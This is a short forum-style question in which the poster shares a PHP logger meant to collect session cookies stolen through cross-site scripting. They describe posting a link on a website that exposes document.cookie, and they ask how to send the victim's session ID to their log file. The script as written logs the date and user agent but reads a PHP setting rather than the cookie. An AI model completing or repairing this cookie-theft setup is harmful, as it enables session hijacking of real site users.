Hey, I've been working on this for a bit and I have a php file that I'm trying to redirect to a test server and then get the cookie with XSS basically.
My php file has:
$cookie = INI_Get('session.cookie_httponly');
$date = date ("l ds of F Y h:i:s A");
$user_agent = $_SERVER['HTTP_USER_AGENT'];
$file = fopen('log.txt', 'a');
fwrite($file, "DATE : $date || USER AGENT : $user_agent || COOKIE : $cookie \n");
So it's writing everything else to the file but the cookie part just shows:
and there is no sessionId, etc.
I tried using other things like "session_Get_Cookie_Params()" but that just gave me: COOKIE: array
If I go to the website and make a post that has a link for "alert('document.cookie')" then it spits the session ID out right away. How can I basically do the same thing only write it to the file?